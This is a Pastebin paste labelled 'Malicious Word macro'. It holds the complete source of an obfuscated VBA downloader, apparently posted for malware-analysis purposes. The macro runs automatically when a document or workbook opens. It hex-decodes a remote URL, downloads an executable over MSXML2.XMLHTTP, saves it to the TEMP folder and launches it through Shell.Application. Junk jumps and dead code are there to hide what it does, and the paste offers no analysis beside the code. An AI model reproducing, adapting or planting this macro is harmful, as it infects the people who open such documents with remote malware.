SHARE
TWEET

Malicious Word macro

dynamoo Dec 17th, 2014 44 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Attribute VB_Name = "ThisDocument"
  2. Attribute VB_Base = "1Normal.ThisDocument"
  3. Attribute VB_GlobalNameSpace = False
  4. Attribute VB_Creatable = False
  5. Attribute VB_PredeclaredId = True
  6. Attribute VB_Exposed = True
  7. Attribute VB_TemplateDerived = True
  8. Attribute VB_Customizable = True
  9. Function UDTTLHNNLLR(ByVal JZWYUDMMKHA As String, ByVal WFSSTRSIBJM As String) As Boolean
  10.      Dim RYNLMLSHMMO As Object, GYMRNGSWQQQ As Long, UGNASOWUCJI As Long, XHXKIQBTCVN() As Byte
  11.  
  12. GoTo vtmvgfzsyydefxdcjcigezvndrzaxivucpeuplxmqhvxfimxkbagctp
  13. Dim yhrwkrzbhxzwqryrcrwlkfuvzxvyqhdozcmmerghtguwuqfbshhdeld As String
  14. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("75727A6577626A7873657979637A636B6B786F6A6B75676867696B777167746A666176737577786C626B78706E7A766462706F6277626B") For Binary As #24764
  15. Put #24764, , yhrwkrzbhxzwqryrcrwlkfuvzxvyqhdozcmmerghtguwuqfbshhdeld
  16. Close #24764
  17. vtmvgfzsyydefxdcjcigezvndrzaxivucpeuplxmqhvxfimxkbagctp:
  18.     Set RYNLMLSHMMO = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("4D53584D4C322E584D4C48545450"))
  19. GoTo gbcznversblaedbsmidektezzjmdavhwqhhpzqfbiubeuggzuxyjgba
  20. Dim ylepgrevpgieicywsanogcfykkrlpkdsgqocqjvhvftzstuvikdfmma As String
  21. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("76796664646F756F696C6168626B6A7A62797A77786374637A74626C677466737361756C7565697973627A6E64786F6363726267786979") For Binary As #95221
  22. Put #95221, , ylepgrevpgieicywsanogcfykkrlpkdsgqocqjvhvftzstuvikdfmma
  23. Close #95221
  24. gbcznversblaedbsmidektezzjmdavhwqhhpzqfbiubeuggzuxyjgba:
  25.     RYNLMLSHMMO.Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("474554"), JZWYUDMMKHA, False
  26. GoTo uqunuwpftjpcxboeeyaoscmimdrligherfmextjzvomjtepfxanvbgt
  27. Dim pyqlmlidgyppnoreaobmssolwbwjrexifwellgqggxrjaqeksxxobtg As String
  28. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("75766163766E736175686766687666626A78726F696373646668726C676A676A636A6C666462797271776A6D6B726F61706761616E7378") For Binary As #9306
  29. Put #9306, , pyqlmlidgyppnoreaobmssolwbwjrexifwellgqggxrjaqeksxxobtg
  30. Close #9306
  31. uqunuwpftjpcxboeeyaoscmimdrligherfmextjzvomjtepfxanvbgt:
  32.     RYNLMLSHMMO.Send bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("E0EFF0EEC8C4CB")
  33.  
  34.  
  35.  
  36. GoTo jfbufxfpcxhwfvancghgnbqhtdhiinqttsnsagbelagomwjbnpfdfeq
  37. Dim mtxixskaksklpcbawnrxiurhekwwmpqsovezwwtwmeydojzswrfnxyr As String
  38. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("747668736B61746162706D6A75786C7066706973656D65637877636E616669786D646C61777863647A6779707A76627A7575626A6D7361") For Binary As #61996
  39. Put #61996, , mtxixskaksklpcbawnrxiurhekwwmpqsovezwwtwmeydojzswrfnxyr
  40. Close #61996
  41. jfbufxfpcxhwfvancghgnbqhtdhiinqttsnsagbelagomwjbnpfdfeq:
  42.     XHXKIQBTCVN = RYNLMLSHMMO.responseBody
  43.  
  44. GoTo ovmcwqriqtkzuwdaauergzkkfalapjmgbpraisfeokcwxjdkqlmzvgw
  45. Dim sfksnnazwxconxwyyatnthgictvvlzkycznxiarifyxdbfpwpybuhwx As String
  46. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6574666267646763696567636969686273756D6162626D6972736E69736D726C657076786868717470637766767271756F75657772767A") For Binary As #60350
  47. Put #60350, , sfksnnazwxconxwyyatnthgictvvlzkycznxiarifyxdbfpwpybuhwx
  48. Close #60350
  49. ovmcwqriqtkzuwdaauergzkkfalapjmgbpraisfeokcwxjdkqlmzvgw:
  50.     UGNASOWUCJI = FreeFile
  51.     Open WFSSTRSIBJM For Binary As #UGNASOWUCJI
  52.     Put #UGNASOWUCJI, , XHXKIQBTCVN
  53.     Close #UGNASOWUCJI
  54. GoTo bcwfhdfyravqqytuwvakxkdggqlggtuiegrezlkormbjefwaoalmzhz
  55. Dim nlcaasbsljekgdbgnbedvhwcljgvjyqqvzmauvfqkuzwpmxfjkwvzhi As String
  56. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("706C68726B637772676D6E6E75656C6F6E627A646E756E7369766D7777716565646D6376697466757A6A78656662637171616769766465") For Binary As #90758
  57. Put #90758, , nlcaasbsljekgdbgnbedvhwcljgvjyqqvzmauvfqkuzwpmxfjkwvzhi
  58. Close #90758
  59. bcwfhdfyravqqytuwvakxkdggqlggtuiegrezlkormbjefwaoalmzhz:
  60.    
  61. GoTo bdpgcfjcyqybrkxkdlkwhcelueblirhjzbjikslcugrglzpmbqxszpl
  62. Dim iljtxqmvwockhvqygdxkwopvidgpvqitatomslyieqhaufqdpvhvnmc As String
  63. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6E706A756575796E6E636D756C7071707475717A797462756E63796465746B78786C75636E727A646571667861766A73756C756E6A656D") For Binary As #69362
  64. Put #69362, , iljtxqmvwockhvqygdxkwopvidgpvqitatomslyieqhaufqdpvhvnmc
  65. Close #69362
  66. bdpgcfjcyqybrkxkdlkwhcelueblirhjzbjikslcugrglzpmbqxszpl:
  67. Set bBBBijgboj = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("5368656C6C2E4170706C69636174696F6E"))
  68. GoTo zszhxkwuaxliphvsuplxfmmmycjnyryqymnbgphvmwlqkgceisvyvts
  69. Dim zvxuakausarigrbhfoldquburxmwvltozvrglgcvkttolbvtrvdrcgh As String
  70. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6C62757473677764747069747770707176746276616B6A6864637267706E79636B78717A6D69776B797067666975716A71726F7A736165") For Binary As #82676
  71. Put #82676, , zvxuakausarigrbhfoldquburxmwvltozvrglgcvkttolbvtrvdrcgh
  72. Close #82676
  73. zszhxkwuaxliphvsuplxfmmmycjnyryqymnbgphvmwlqkgceisvyvts:
  74. bBBBijgboj.Open Environ(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("54454D50")) & "\ADGYMSEKRJE.exe"
  75.  End Function
  76. Sub Auto_Open()
  77. GoTo gxcesvzrytwmgpnfzdydwcvshzlloxgsmirvcuebkomddapxaoohijd
  78. Dim usfoyeliixnbtdjolyiyzkxwbjbgjkrwvonixtxsznnchbknwnismrr As String
  79. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6D666C73777475666F72706179686565636879666D6B6E6563707367787A65757A6B78627363626F636F677071716B6673656E636A6B67") For Binary As #70233
  80. Put #70233, , usfoyeliixnbtdjolyiyzkxwbjbgjkrwvonixtxsznnchbknwnismrr
  81. Close #70233
  82. gxcesvzrytwmgpnfzdydwcvshzlloxgsmirvcuebkomddapxaoohijd:
  83. QTQFFWAVZYZ
  84. End Sub
  85. Sub AutoOpen()
  86. GoTo uivmhecwuiwlbimfgalxtqlcqgsrdgcdxvzoqjlbmvygqsadawwnbod
  87. Dim ommfkqgicbhzvxsnjdmcsecmotnxslatlkhbycxrahpzkwuhnwvxwcl As String
  88. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("7868736E61706A72717368786E66666E6372646C6A7A61696567616168776D75747564667763676D617475716777646F6272656C6C656C") For Binary As #99406
  89. Put #99406, , ommfkqgicbhzvxsnjdmcsecmotnxslatlkhbycxrahpzkwuhnwvxwcl
  90. Close #99406
  91. uivmhecwuiwlbimfgalxtqlcqgsrdgcdxvzoqjlbmvygqsadawwnbod:
  92.     Auto_Open
  93. End Sub
  94. Sub Workbook_Open()
  95. GoTo xxnryhubwoumsgallobzqbhnudqiegipodsbviyqnfdvlorvstshjoz
  96. Dim tgctjrzhvnobidbwvwfqdulntkywxnojcbyyjbglyutkatmmtkssbxb As String
  97. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("656C666B6564787670696C7864626A7375796E6C6674626A71736F647163657569756573716F6D72616E75656268777074776F6C657962") For Binary As #52822
  98. Put #52822, , tgctjrzhvnobidbwvwfqdulntkywxnojcbyyjbglyutkatmmtkssbxb
  99. Close #52822
  100. xxnryhubwoumsgallobzqbhnudqiegipodsbviyqnfdvlorvstshjoz:
  101.     Auto_Open
  102. End Sub
  103.  
  104. GoTo ujuupwagavxxttpthatlgfenwuvykdhddukuvzyztzdbskjhhnscqru
  105. Dim mpjunamyoddhpjlckwqydefzmiqxmtdzvxzptikszkphtiolhryphyi As String
  106. Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6D6371647A747467686B6D6D7A66727066696D646C686C7167676776707477797469696C6B7463697876726F6E6E636B6C666C70706B77") For Binary As #3723
  107. Put #3723, , mpjunamyoddhpjlckwqydefzmiqxmtdzvxzptikszkphtiolhryphyi
  108. Close #3723
  109. ujuupwagavxxttpthatlgfenwuvykdhddukuvzyztzdbskjhhnscqru:
  110.      
  111. End Sub
  112. Sub QTQFFWAVZYZ()
  113.     UDTTLHNNLLR bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("687474703A2F2F6F70656E737461636B73672E636F6D2F6A732F62696E2E657865"), Environ("TEMP") & "\ADGYMSEKRJE.exe"
  114. End Sub
  115.  
  116.  
  117. Public Function bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr(ByVal GVHUjdsf4f As String) As String
  118.   Dim i       As Long
  119.   For i = 1 To Len(GVHUjdsf4f) Step 2
  120. If 871851 = 871851 + 1 Then End
  121. If 6292 < 27 Then
  122. If 549589 = 549589 + 1 Then End
  123. If 2244 < 25 Then
  124.         MsgBox ("ZRhNNOHl97")
  125. End If
  126. If Len("ZOhjMOnl6417") = Len("xeFXDFFY") Then
  127.        MsgBox ("Error !!!")
  128. End If
  129.         MsgBox ("fSlPSZnM79")
  130.  
  131. End If
  132. If Len("CSHpvLRP9465") = Len("vhlxUkrj") Then
  133. If 272625 = 272625 + 1 Then End
  134. If 2624 < 82 Then
  135.         MsgBox ("TQxnjYFY33")
  136. End If
  137. If Len("ZuzjUIji3464") = Len("rPTEHuGF") Then
  138.        MsgBox ("Error !!!")
  139. End If
  140.        MsgBox ("Error !!!")
  141.  
  142. End If
  143. If 958631 = 958631 + 1 Then End
  144. If 7345 < 91 Then
  145.         MsgBox ("aPgyRpZl73")
  146. End If
  147. If Len("aHfxvpdl1518") = Len("pRWkXaVk") Then
  148.        MsgBox ("Error !!!")
  149. End If
  150.   bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr = bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr & Chr$(Val("&H" & Mid$(GVHUjdsf4f, i, 2)))
  151.  
  152.  
  153.   Next i
  154.  End Function
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top